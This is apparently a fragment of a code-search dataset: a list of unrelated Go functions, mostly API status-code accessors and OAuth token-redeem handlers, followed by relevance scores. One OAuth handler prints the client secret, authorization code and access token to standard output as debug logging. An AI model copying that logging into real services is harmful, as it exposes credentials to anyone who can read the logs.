{\n panic(err)\n }\n}", "func (o *DescribeServerConflict) Code() int {\n\treturn 409\n}", "func addRtncode(code string, mesg string) *API.RtnMtrlA {\n\n\treFlag = false\n\trtn := new(API.RtnMtrlA)\n\trtn.Rtncode = code\n\trtn.Rtnmesg = mesg\n\n\treturn rtn\n}", "func (o *PatchEquipmentIoExpandersMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ReorderSecurityRealmsBadRequest) IsCode(code int) bool {\n\treturn code == 400\n}", "func (o *QueryScheduledScansTooManyRequests) Code() int {\n\treturn 429\n}", "func (o *WebModifyAccepted) IsCode(code int) bool {\n\treturn code == 202\n}", "func (o *QueryApplicationsTooManyRequests) Code() int {\n\treturn 429\n}", "func (o *CreateAntivirusServerDefault) Code() int {\n\treturn o._statusCode\n}", "func ajaxCode(r *http.Request) ([]byte, error) {\n\tif tid, e := convert.Id(r.FormValue(\"test-id\")); e == nil {\n\t\tt, e := db.JUnitTest(bson.M{db.ID: tid}, bson.M{db.TEST: 1})\n\t\tif e != nil {\n\t\t\treturn nil, e\n\t\t}\n\t\treturn util.JSON(map[string]interface{}{\"code\": string(t.Test)})\n\t}\n\tm := bson.M{}\n\tif rid, e := convert.Id(r.FormValue(\"result-id\")); e == nil {\n\t\ttr, e := db.Tooler(bson.M{db.ID: rid}, bson.M{db.FILEID: 1})\n\t\tif e != nil {\n\t\t\treturn nil, e\n\t\t}\n\t\tm[db.ID] = tr.GetFileId()\n\t}\n\tif id, e := convert.Id(r.FormValue(\"file-id\")); e == nil {\n\t\tm[db.ID] = id\n\t}\n\tif n, e := webutil.String(r, \"tool-name\"); e == nil {\n\t\td, e := context.NewResult(n)\n\t\tif e != nil {\n\t\t\treturn nil, e\n\t\t}\n\t\tif d.FileID != \"\" {\n\t\t\tm[db.ID] = d.FileID\n\t\t} else if pid, e := convert.Id(r.FormValue(\"project-id\")); e == nil {\n\t\t\treturn loadTestCode(pid, d.Name)\n\t\t} else {\n\t\t\treturn nil, fmt.Errorf(\"could not load code for %s\", d.Format())\n\t\t}\n\t}\n\tf, e := db.File(m, bson.M{db.DATA: 1})\n\tif e != nil {\n\t\treturn nil, e\n\t}\n\treturn util.JSON(map[string]interface{}{\"code\": string(f.Data)})\n}", "func (c *Client) PostCode(ctx context.Context) (status string, code int, err error) {\n\tstatus, code, metadata, err := bmc.GetPostCodeInterfaces(ctx, c.Registry.GetDriverInterfaces())\n\tc.setMetadata(metadata)\n\treturn status, code, err\n}", "func (o *DcimRackRolesBulkPartialUpdateOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (s *TooManyRequests) Code() string {\n\treturn \"TooManyRequests\"\n}", "func (s *BasemumpsListener) EnterCode(ctx *CodeContext) {}", "func (c *Client) ResendVerification(rv www.ResendVerification) (*www.ResendVerificationReply, error) {\n\trespBody, err := c.makeRequest(http.MethodPost, www.PoliteiaWWWAPIRoute,\n\t\twww.RouteResendVerification, rv)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar rvr www.ResendVerificationReply\n\terr = json.Unmarshal(respBody, &rvr)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unmarshal ResendVerificationReply: %v\", err)\n\t}\n\n\tif c.cfg.Verbose {\n\t\terr := prettyPrintJSON(rvr)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn &rvr, nil\n}", "func (p *OIDCIBMProvider) Redeem(redirectURL, code string) (s *SessionState, err error) {\n\tctx := context.Background()\n\tc := oauth2.Config{\n\t\tClientID: p.ClientID,\n\t\tClientSecret: p.ClientSecret,\n\t\tEndpoint: oauth2.Endpoint{\n\t\t\tTokenURL: p.RedeemURL.String(),\n\t\t},\n\t\tRedirectURL: redirectURL,\n\t}\n\n\t// 20180629 - TL: Added logging\n\tfmt.Printf(\"Client ID: %s\\n\", p.ClientID)\n\tfmt.Printf(\"Client Secret: %s\\n\", p.ClientSecret)\n\tfmt.Printf(\"Token URL: %s\\n\", p.RedeemURL.String())\n\tfmt.Printf(\"Redirect URL: %s\\n\", redirectURL)\n\tfmt.Printf(\"Code: %s\\n\", code)\n\n\t// 20180629 - TL: Add in a parameter to handle registering broken oauth2's\n\toauth2.RegisterBrokenAuthHeaderProvider(p.RedeemURL.String())\n\n\ttoken, err := c.Exchange(ctx, code)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"token exchange: %v\", err)\n\t}\n\tfmt.Printf(\"Token: %v\\n\", token)\n\ts, err = p.createSessionState(ctx, token)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unable to update session: %v\", err)\n\t}\n\treturn\n}", "func (o *UpdateDockerRegistryWebhookByNameUsingPUTOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (suo *SubjectUpdateOne) SetCode(i int) *SubjectUpdateOne {\n\tsuo.mutation.ResetCode()\n\tsuo.mutation.SetCode(i)\n\treturn suo\n}", "func respondJsendCode(w http.ResponseWriter, response *JSend, statusCode int) {\n\tw.Header().Set(\"Cache-Control\", \"no-cache\")\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\tif len(response.Failures) > 0 && response.Message == \"\" {\n\t\tresponse.Message = \"One or more item has failed. Check the individual failures for details.\"\n\t}\n\n\tresult, err := json.MarshalIndent(response, \"\", \" \")\n\tif err != nil {\n\t\tlog.Errorf(\"Error marshalling response: %s\", err)\n\n\t\tresult, _ = json.Marshal(&JSend{\n\t\t\tStatus: statusError,\n\t\t\tMessage: \"An internal error occurred, and we'll look into it.\",\n\t\t})\n\t}\n\n\tif statusCode <= 0 {\n\t\tswitch response.Status {\n\t\tcase statusFail:\n\t\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tcase statusError:\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t}\n\t\t//default is status 200\n\t} else {\n\t\tw.WriteHeader(statusCode)\n\t}\n\n\t// if data has an etag use it\n\tswitch t := response.Data.(type) {\n\tcase etagger:\n\t\tw.Header().Set(\"ETag\", t.Etag())\n\t}\n\n\t_, err = w.Write(result)\n\tif err != nil {\n\t\tlog.WithField(\"JSEND\", result).Errorf(\"Error writing jsend response: %s\", err)\n\t}\n}", "func resendAccountActivationEmail(email string) api.Response {\n\tactivationLink, err := auth.ResendAccountActivationEmail(email)\n\tif err != nil {\n\t\treturn api.InternalServerError(err)\n\t}\n\n\treturn api.PlainTextResponse(http.StatusOK, activationLink)\n}", "func (o *PatchAddonDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *InvalidatesCacheBadRequest) Code() int {\n\treturn 400\n}", "func (o *PatchServiceAccountTokenOK) Code() int {\n\treturn 200\n}", "func (o *EmsDestinationModifyOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (c *APIClient) addResponseCode(code int) {\n\tc.respCodes = append(c.respCodes, code)\n}", "func (refreshProtocol *RefreshProtocol) Recode(ciphertext *ckks.Ciphertext, targetScale float64) {\n\tdckksContext := refreshProtocol.dckksContext\n\tringQ := refreshProtocol.dckksContext.ringQ\n\n\tinputScaleFlo := ring.NewFloat(ciphertext.Scale(), 256)\n\toutputScaleFlo := ring.NewFloat(targetScale, 256)\n\n\tinputScaleInt := new(big.Int)\n\toutputScaleInt := new(big.Int)\n\n\tinputScaleFlo.Int(inputScaleInt)\n\toutputScaleFlo.Int(outputScaleInt)\n\n\tringQ.InvNTTLvl(ciphertext.Level(), ciphertext.Value()[0], ciphertext.Value()[0])\n\n\tringQ.PolyToBigint(ciphertext.Value()[0], refreshProtocol.maskBigint)\n\n\tQStart := ring.NewUint(ringQ.Modulus[0])\n\tfor i := 1; i < ciphertext.Level()+1; i++ {\n\t\tQStart.Mul(QStart, ring.NewUint(ringQ.Modulus[i]))\n\t}\n\n\tQHalf := new(big.Int).Rsh(QStart, 1)\n\n\tfor ciphertext.Level() != dckksContext.params.MaxLevel() {\n\t\tciphertext.Value()[0].Coeffs = append(ciphertext.Value()[0].Coeffs, make([][]uint64, 1)...)\n\t\tciphertext.Value()[0].Coeffs[ciphertext.Level()] = make([]uint64, dckksContext.n)\n\t}\n\n\tvar sign int\n\tfor i := 0; i < dckksContext.n; i++ {\n\t\tsign = refreshProtocol.maskBigint[i].Cmp(QHalf)\n\t\tif sign == 1 || sign == 0 {\n\t\t\trefreshProtocol.maskBigint[i].Sub(refreshProtocol.maskBigint[i], QStart)\n\t\t}\n\n\t\trefreshProtocol.maskBigint[i].Mul(refreshProtocol.maskBigint[i], outputScaleInt)\n\t\trefreshProtocol.maskBigint[i].Quo(refreshProtocol.maskBigint[i], inputScaleInt)\n\t}\n\n\tringQ.SetCoefficientsBigintLvl(ciphertext.Level(), refreshProtocol.maskBigint, ciphertext.Value()[0])\n\n\tringQ.NTTLvl(ciphertext.Level(), ciphertext.Value()[0], ciphertext.Value()[0])\n\n\tciphertext.SetScale(targetScale)\n}", "func (o *UpdateSiteScriptDefault) Code() int {\n\treturn o._statusCode\n}", "func (rr *OPT) SetExtendedRcode(v uint16) {\n\trr.Hdr.Ttl = rr.Hdr.Ttl&0x00FFFFFF | uint32(v>>4)<<24\n}", "func (_BaseContent *BaseContentTransactor) SetStatusCode(opts *bind.TransactOpts, status_code *big.Int) (*types.Transaction, error) {\n\treturn _BaseContent.contract.Transact(opts, \"setStatusCode\", status_code)\n}", "func (o *UpdateGerritListenerByNameUsingPUTNotFound) IsCode(code int) bool {\n\treturn code == 404\n}", "func (o *EmsDestinationModifyDefault) Code() int {\n\treturn o._statusCode\n}", "func (su *SubjectUpdate) SetCode(i int) *SubjectUpdate {\n\tsu.mutation.ResetCode()\n\tsu.mutation.SetCode(i)\n\treturn su\n}", "func (o *PatchServiceAccountTokenNoContent) Code() int {\n\treturn 204\n}", "func (t *SimpleChaincode)ReplacePartOnAssembly(stub shim.ChaincodeStubInterface, args []string)([]byte, error) {\n\t\n\tkey := args[0] \t\t\t\t// L'id de l'Assembly\n\tidpart := args[1] \t\t\t\t// L'id de l'ancien Part \n\tidpart1 := args[2] \t\t\t\t// L'id du nouveau part \n// Debut Partie Assembly \n\t\tac,err:=findAssemblyById(stub,key)\n\t\tif(err !=nil){return nil,err}\n\t\tptAS1, _ := json.Marshal(ac)\n\tvar airc Assembly\n\t\terr = json.Unmarshal(ptAS1, &airc)\n\t\tif err != nil {return nil, errors.New(\"Failed to Unmarshal Part #\" + key)}\n\t\tairc.Parts = append(airc.Parts, idpart1)\t\n\tfor i, v := range airc.Parts{\n\t\t\tif v == idpart {\n\t\t\t\tairc.Parts = append(airc.Parts[:i], airc.Parts[i+1:]...)\n\t\t\tbreak\n\t\t}\n\t\t\t}\n\tvar tx LogAssembly\n\t\ttx.Responsible = airc.Responsible\n\t\ttx.Owner \t\t= airc.Owner\n\t\ttx.LType \t\t= \"PART_SUBSTITUTION\"\n\t\ttx.Description = \"PART_SUBSTITUTION : \" + idpart1 + \" replace \" + idpart\n\t\ttx.VDate\t\t= args [3]\n\t\tairc.Logs = append(airc.Logs, tx)\n\ty:= UpdateAssembly (stub, airc) \n\t\tif y != nil { return nil, errors.New(y.Error())}\n// Fin Partie Assembly \n// Debut Partie Part\t\n\t\tpart,err:=findPartById(stub,idpart)\n\t\tif err != nil {return nil, errors.New(\"Failed to get part #\" + key)}\n\t\tptAS, _ := json.Marshal(part)\n\tvar pt Part\n\t\terr = json.Unmarshal(ptAS, &pt)\n\t\tif err != nil {return nil, errors.New(\"Failed to Unmarshal Part #\" + key)}\n\tpartt,err:=findPartById(stub,idpart1)\n\t\tif err != nil {return nil, errors.New(\"Failed to get part #\" + key)}\n\t\tptASS, _ := json.Marshal(partt)\n\tvar ptt Part\n\t\terr = json.Unmarshal(ptASS, &ptt)\n\t\tif err != nil {return nil, errors.New(\"Failed to Unmarshal Part #\" + key)}\n\t\tptt.Assembly = key\n\t\tptt.Owner = airc.Owner \n\t\tptt.Responsible = pt.Responsible\n\t\tptt.Helicopter = pt.Helicopter\n\t\tptt.PN = pt.PN\n\tvar tff Log\n\t\ttff.Responsible = ptt.Responsible\n\t\ttff.Owner \t\t= ptt.Owner\n\t\ttff.LType \t\t= \"ASSEMBLY_AFFILIATION\"\n\t\ttff.Description = \"AFFILIATED TO ASSEMBLY \" + key + \" AND SUBSTITUTES PART: \" + idpart\n\t\ttff.VDate \t\t= args [3]\n\t\tptt.Logs = append(ptt.Logs, tff)\n\tr:= UpdatePart (stub, ptt) \n\t\tif r != nil { return nil, errors.New(r.Error())}\n\t\t\n\t\tpt.Assembly = \"\" // Le champ Assembly de la part retirée de l'Assembly revient à nul.\n\t\tpt.Owner = \"REMOVAL_MANAGER\" \n\t\tpt.Responsible = \"REMOVAL_MANAGER\"\n\tvar tf Log\n\t\ttf.Responsible = pt.Responsible\n\t\ttf.Owner \t\t= pt.Owner\n\t\ttf.LType \t\t= \"ASSEMBLY_REMOVAL\"\n\t\ttf.Description = \"REMOVED FROM ASSEMBLY \" + key + \" SUBSTITUTED BY PART: \" + idpart1 + \" This part has been transfered to \" + pt.Owner + \", the new Owner. \"\n\t\ttf.VDate \t\t= args [3]\n\t\tpt.Logs = append(pt.Logs, tf)\n\te:= UpdatePart (stub, pt) \n\t\tif e != nil { return nil, errors.New(e.Error())}\t\n// Fin Partie Part \nfmt.Println(\"Responsible created successfully\")\t\nreturn nil, nil\n}", "func (p *AzureProvider) Redeem(redirectURL, code string) (s *sessions.SessionState, err error) {\n\tif code == \"\" {\n\t\terr = errors.New(\"missing code\")\n\t\treturn\n\t}\n\n\tparams := url.Values{}\n\tparams.Add(\"redirect_uri\", redirectURL)\n\tparams.Add(\"client_id\", p.ClientID)\n\tparams.Add(\"client_secret\", p.ClientSecret)\n\tparams.Add(\"code\", code)\n\tparams.Add(\"grant_type\", \"authorization_code\")\n\tif p.ProtectedResource != nil && p.ProtectedResource.String() != \"\" {\n\t\tparams.Add(\"resource\", p.ProtectedResource.String())\n\t}\n\n\tvar req *http.Request\n\treq, err = http.NewRequest(\"POST\", p.RedeemURL.String(), bytes.NewBufferString(params.Encode()))\n\tif err != nil {\n\t\treturn\n\t}\n\treq.Header.Set(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n\tvar resp *http.Response\n\tresp, err = http.DefaultClient.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar body []byte\n\tbody, err = ioutil.ReadAll(resp.Body)\n\t_ = resp.Body.Close()\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif resp.StatusCode != 200 {\n\t\terr = fmt.Errorf(\"got %d from %q %s\", resp.StatusCode, p.RedeemURL.String(), body)\n\t\treturn\n\t}\n\n\t// blindly try json and x-www-form-urlencoded\n\tvar jsonResponse struct {\n\t\tExpiresIn int64 `json:\"expires_in,string\"`\n\t\tAccessToken string `json:\"access_token\"`\n\t\tRefreshToken string `json:\"refresh_token\"`\n\t}\n\n\tif err = json.Unmarshal(body, &jsonResponse); err != nil {\n\t\terr = fmt.Errorf(\"decoding redeem response failed, %s\", err)\n\t\treturn\n\t}\n\n\ts = &sessions.SessionState{\n\t\tCreatedAt: time.Now(),\n\t\tExpiresOn: time.Now().Add(time.Duration(jsonResponse.ExpiresIn-300) * time.Second).Truncate(time.Second),\n\t\tRefreshToken: jsonResponse.RefreshToken,\n\t\tAccessToken: jsonResponse.AccessToken,\n\t}\n\treturn\n}", "func (w showCodeOk) Changed(app gowid.IApp, widget gowid.IWidget, data ...interface{}) {\n\tvar client wormhole.Client\n\n\t// goroutine so I don't block ui goroutine\n\tgo func() {\n\t\tctx := context.Background()\n\t\tmsg, err := client.Receive(ctx, w.Args.Code)\n\t\treject := true\n\n\t\tif err != nil {\n\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\tw.previous.Close(app)\n\t\t\t\tw.doReceiveError(err, app)\n\t\t\t}))\n\t\t\treturn\n\t\t}\n\n\t\tdefer func() {\n\t\t\t//fmt.Fprintf(os.Stderr, \"GCLA: will I reject? reject is %v\\n\", reject)\n\t\t\tif reject {\n\t\t\t\tmsg.Reject()\n\t\t\t}\n\t\t}()\n\n\t\tswitch msg.Type {\n\t\tcase wormhole.TransferText:\n\n\t\t\t// Wormhole william doesn't allow rejecting text message\n\t\t\t// transfers\n\t\t\treject = false\n\n\t\t\tspin := spinner.New(spinner.Options{\n\t\t\t\tStyler: gowid.MakePaletteRef(\"progress-spinner\"),\n\t\t\t})\n\n\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\tw.previous.Close(app)\n\t\t\t\tw.doSpin(spin, app)\n\t\t\t}))\n\n\t\t\tdone := make(chan struct{})\n\t\t\tvar transferredMessage []byte\n\n\t\t\tgo func() {\n\t\t\t\ttransferredMessage, err = ioutil.ReadAll(msg)\n\n\t\t\t\tdefer close(done)\n\n\t\t\t\tif err != nil {\n\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\tw.doTextTransferError(err, app)\n\t\t\t\t\t}))\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Artificial delay makes a nicer experience\n\t\t\t\ttime.Sleep(1000 * time.Millisecond)\n\t\t\t}()\n\n\t\t\tgo func() {\n\t\t\t\tc := time.Tick(100 * time.Millisecond)\n\t\t\tloop:\n\t\t\t\tfor {\n\t\t\t\t\tselect {\n\t\t\t\t\tcase <-done:\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\t\tw.doMessageThenQuit(string(transferredMessage), \"Quit\", app)\n\t\t\t\t\t\t}))\n\t\t\t\t\t\tbreak loop\n\t\t\t\t\tcase <-c:\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tspin.Update()\n\t\t\t\t\t\t}))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\tcase wormhole.TransferFile:\n\t\t\tprog := progress.New(progress.Options{\n\t\t\t\tNormal: gowid.MakePaletteRef(\"progress-default\"),\n\t\t\t\tComplete: gowid.MakePaletteRef(\"progress-complete\"),\n\t\t\t})\n\n\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\tw.previous.Close(app)\n\t\t\t\tw.doProg(msg.Name, Transfer(msg.Type), prog, app)\n\t\t\t\t//w.InTransfer = true\n\t\t\t}))\n\n\t\t\tdone := make(chan struct{})\n\t\t\tread := 0\n\n\t\t\t// Only set if dir or file\n\t\t\tsavedFilename := filepath.Join(w.Args.SaveDir, msg.Name)\n\t\t\tif !w.Args.Overwrite && fileExists(savedFilename) {\n\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\tw.doNoOverwrite(savedFilename, app)\n\t\t\t\t}))\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tf, err := os.Create(savedFilename)\n\t\t\tif err != nil {\n\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\tw.doFileCreateError(savedFilename, err, app)\n\t\t\t\t}))\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\treject = false\n\n\t\t\tgo func() {\n\t\t\t\t_, err = io.Copy(f, &progReader{read: &read, Reader: msg})\n\n\t\t\t\tdefer func() {\n\t\t\t\t\tf.Close()\n\t\t\t\t\tclose(done)\n\t\t\t\t}()\n\n\t\t\t\tif err != nil {\n\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\tw.doFileTransferError(savedFilename, err, app)\n\t\t\t\t\t}))\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\tgo func() {\n\t\t\t\tc := time.Tick(250 * time.Millisecond)\n\t\t\tloop:\n\t\t\t\tfor {\n\t\t\t\t\tselect {\n\t\t\t\t\tcase <-done:\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tprog.SetTarget(app, int(msg.UncompressedBytes64))\n\t\t\t\t\t\t\tprog.SetProgress(app, int(msg.UncompressedBytes64))\n\n\t\t\t\t\t\t\t// Delay at 100% is nice\n\t\t\t\t\t\t\ttime.AfterFunc(1*time.Second, func() {\n\t\t\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\t\t\t//w.InTransfer = false\n\t\t\t\t\t\t\t\t\tw.previous.Close(app)\n\n\t\t\t\t\t\t\t\t\tif w.Args.OpenCmd == \"\" {\n\t\t\t\t\t\t\t\t\t\tw.doSavedAs(savedFilename, app)\n\t\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\t\tif w.Args.NoAskOpen {\n\t\t\t\t\t\t\t\t\t\t\tw.doOpen(savedFilename, app)\n\t\t\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\t\t\tw.doAskToOpen(savedFilename, app)\n\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}))\n\t\t\t\t\t\t\t})\n\n\t\t\t\t\t\t}))\n\t\t\t\t\t\tbreak loop\n\t\t\t\t\tcase <-c:\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tprog.SetTarget(app, int(msg.UncompressedBytes64))\n\t\t\t\t\t\t\tprog.SetProgress(app, read)\n\t\t\t\t\t\t}))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\tcase wormhole.TransferDirectory:\n\n\t\t\tdirName := filepath.Join(w.Args.SaveDir, msg.Name)\n\n\t\t\terr = os.Mkdir(dirName, 0777)\n\t\t\tif err != nil {\n\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\tw.doError(err, app)\n\t\t\t\t}))\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\ttmpFile, err := ioutil.TempFile(w.Args.SaveDir, fmt.Sprintf(\"%s.zip.tmp\", msg.Name))\n\t\t\tif err != nil {\n\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\tw.doError(err, app)\n\t\t\t\t}))\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tprog := progress.New(progress.Options{\n\t\t\t\tNormal: gowid.MakePaletteRef(\"progress-default\"),\n\t\t\t\tComplete: gowid.MakePaletteRef(\"progress-complete\"),\n\t\t\t})\n\n\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\tw.previous.Close(app)\n\t\t\t\tw.doProg(msg.Name, Transfer(msg.Type), prog, app)\n\t\t\t}))\n\n\t\t\tdone := make(chan struct{})\n\t\t\tread := 0\n\n\t\t\treject = false\n\n\t\t\tgo func() {\n\n\t\t\t\terrme := func(w showCodeOk, err error, app gowid.IApp) {\n\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\tw.doError(err, app)\n\t\t\t\t\t}))\n\t\t\t\t}\n\n\t\t\t\tdefer func() {\n\t\t\t\t\ttmpFile.Close()\n\t\t\t\t\tos.Remove(tmpFile.Name())\n\t\t\t\t\tclose(done)\n\t\t\t\t}()\n\n\t\t\t\tn, err := io.Copy(tmpFile, &progReader{read: &read, Reader: msg})\n\n\t\t\t\tif err != nil {\n\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\tw.doFileTransferError(msg.Name, err, app)\n\t\t\t\t\t}))\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\ttmpFile.Seek(0, io.SeekStart)\n\t\t\t\tzr, err := zip.NewReader(tmpFile, int64(n))\n\t\t\t\tif err != nil {\n\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\tw.doError(err, app)\n\t\t\t\t\t}))\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tfor _, zf := range zr.File {\n\t\t\t\t\tp, err := filepath.Abs(filepath.Join(dirName, zf.Name))\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\terrme(w, err, app)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\tif !strings.HasPrefix(p, dirName) {\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\t\tw.doMessageThenQuit(fmt.Sprintf(\"Dangerous filename found: %s\", zf.Name), \"Quit\", app)\n\t\t\t\t\t\t}))\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\trc, err := zf.Open()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\t\tw.doMessageThenQuit(fmt.Sprintf(\"%s open failed: %v\", zf.Name, err), \"Quit\", app)\n\t\t\t\t\t\t}))\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\tdir := filepath.Dir(p)\n\t\t\t\t\terr = os.MkdirAll(dir, 0777)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\terrme(w, err, app)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\tf, err := os.Create(p)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\terrme(w, err, app)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\t_, err = io.Copy(f, rc)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\terrme(w, err, app)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\terr = f.Close()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\terrme(w, err, app)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\trc.Close()\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\tgo func() {\n\t\t\t\tc := time.Tick(250 * time.Millisecond)\n\t\t\tloop:\n\t\t\t\tfor {\n\t\t\t\t\tselect {\n\t\t\t\t\tcase <-done:\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tprog.SetTarget(app, int(msg.UncompressedBytes64))\n\t\t\t\t\t\t\tprog.SetProgress(app, int(msg.UncompressedBytes64))\n\n\t\t\t\t\t\t\t// Delay at 100% is nice\n\t\t\t\t\t\t\ttime.AfterFunc(1*time.Second, func() {\n\t\t\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\t\t\tw.previous.Close(app)\n\t\t\t\t\t\t\t\t\tw.doSavedAs(dirName, app)\n\t\t\t\t\t\t\t\t}))\n\t\t\t\t\t\t\t})\n\n\t\t\t\t\t\t}))\n\t\t\t\t\t\tbreak loop\n\t\t\t\t\tcase <-c:\n\t\t\t\t\t\tapp.Run(gowid.RunFunction(func(app gowid.IApp) {\n\t\t\t\t\t\t\tprog.SetTarget(app, int(msg.UncompressedBytes64))\n\t\t\t\t\t\t\tprog.SetProgress(app, read)\n\t\t\t\t\t\t}))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\t}\n\n\t}()\n}", "func (o *QueryScheduledScansOK) Code() int {\n\treturn 200\n}", "func qrencode(_ js.Value, args []js.Value) interface{} {\n\tcode, err := qr.Encode(args[0].String(), qr.L)\n\tif err != nil {\n\t\treturn nil\n\t}\n\tpng := code.PNG()\n\tdst := js.Global().Get(\"Uint8Array\").New(len(png))\n\tjs.CopyBytesToJS(dst, png)\n\treturn dst\n}", "func (o *EmsConfigModifyOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func ReplyWithCode(w http.ResponseWriter, code int) {\n\n\tif code < 400 {\n\t\th := w.Header()\n\t\th.Set(\"Content-Length\", \"2\")\n\t\th.Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(code)\n\t\tw.Write(emptyObj)\n\t} else {\n\t\terr := http.StatusText(code)\n\t\tif err == \"\" {\n\t\t\terr = \"E\" + strconv.Itoa(code)\n\t\t}\n\t\tReplyErr(w, code, err)\n\t}\n}", "func (o *DcimRackRolesBulkPartialUpdateDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateIOAExclusionsV1OK) Code() int {\n\treturn 200\n}", "func (o *UpdateFirewallPoliciesInternalServerError) Code() int {\n\treturn 500\n}" ]
[ "0.6858339", "0.59381795", "0.58342206", "0.55491394", "0.5370716", "0.53603715", "0.53393215", "0.53146356", "0.53073716", "0.53061116", "0.5272337", "0.52508247", "0.5212652", "0.5147963", "0.5101353", "0.5094711", "0.509436", "0.509355", "0.5080473", "0.5077903", "0.5073909", "0.5065425", "0.5056389", "0.50485027", "0.50375396", "0.50169647", "0.49947378", "0.49907655", "0.49905154", "0.498521", "0.497776", "0.49620366", "0.49441722", "0.49268386", "0.49203044", "0.4910305", "0.49098757", "0.48999682", "0.4892151", "0.48837614", "0.48686105", "0.4851702", "0.48483962", "0.48470986", "0.48403722", "0.48385525", "0.483784", "0.48268425", "0.48257732", "0.48239887", "0.4820037", "0.4818347", "0.4818112", "0.48080927", "0.48028305", "0.47953868", "0.47919053", "0.47918034", "0.47916904", "0.47899273", 